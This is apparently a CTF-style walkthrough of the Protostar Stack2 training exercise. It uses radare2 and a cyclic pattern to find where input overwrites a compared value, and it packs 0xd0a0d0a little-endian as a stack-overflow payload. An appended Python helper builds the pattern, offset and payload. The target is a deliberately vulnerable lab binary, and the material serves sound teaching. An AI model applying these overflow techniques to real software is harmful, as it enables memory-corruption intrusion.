2017, Dec 18

# Exploiting Protostar Stack2

You can check previous problems here:

## Problem source code

In this problem we will work as if we did not have the C source code.

As you can see, our binary is a 32-bit ELF file, not stripped, and it isn't protected with canaries, PIC, NX or RELRO.

## Let's have a look at what's happening inside the app

We will start the app inside radare2 and look at it in Visual Mode to understand how it works.

So the key line is `cmp eax, 0xd0a0d0a`, and our main goal is to overwrite `$eax` with 0xd0a0d0a.

Now we'll use a tool from the radare2 framework called ragg2, which lets us generate a cyclic pattern (a De Bruijn sequence) and find the exact offset at which our input overwrites the value in the buffer.

In Visual Mode you can step instruction by instruction with `S` until you reach the line just before `cmp eax, 0xd0a0d0a`.

Now let's rewrite our payload and exploit the binary. **Notice that we are working on a little-endian architecture, so 0xd0a0d0a will be written as `\x0a\x0d\x0a\x0d` (byte order reversed).**

Oops, it did not work with a file because `\x0a` is `\n` in ASCII, so it's not working with env :(

And we did it ;)
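The steps above in one place, as an added Python example (not code from the original post, radare2 or Protostar): the cyclic pattern ragg2 produces, the offset lookup from the value observed in `eax`, the little-endian packing of 0xd0a0d0a, and a check that explains why the file-based attempt failed by flagging the `\x0a`/`\x0d` bytes that shells and line-oriented readers treat as line terminators. The `"A"` filler and the 26-letter alphabet are assumptions.

```python
import struct
from itertools import islice

ALPHABET = "abcdefghijklmnopqrstuvwxyz"  # assumed alphabet, like pwntools' cyclic()


def de_bruijn(alphabet=ALPHABET, n=4):
    """Yield the De Bruijn sequence B(k, n): every window of n characters
    is unique, which is what makes the cyclic pattern usable as a ruler."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in a[1:p + 1]:
                    yield alphabet[i]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic_pattern(length):
    """First `length` bytes of the pattern (what ragg2 -P would hand you)."""
    return "".join(islice(de_bruijn(), length)).encode()


def find_offset(pattern, value):
    """Map the 32-bit value seen in eax after the overwrite back to the
    offset in the pattern it was read from (-1 if not found). The register
    holds the bytes little-endian, so pack the value the same way."""
    return pattern.find(struct.pack("<I", value))


def build_payload(offset, value):
    """Filler up to the offset, then the target value in little-endian order."""
    return b"A" * offset + struct.pack("<I", value)


def line_terminator_positions(payload):
    """Positions of 0x0a ('\\n') and 0x0d ('\\r') in the payload: these are the
    bytes that get mangled when the payload goes through a file or a line-
    oriented shell read, which is why 0xd0a0d0a is awkward to deliver."""
    return [(i, b) for i, b in enumerate(payload) if b in (0x0a, 0x0d)]
```

Running `find_offset(cyclic_pattern(200), value)` with the value shown by `eax` in Visual Mode gives the same offset ragg2 reports, and `build_payload` then places 0xd0a0d0a as `\x0a\x0d\x0a\x0d`.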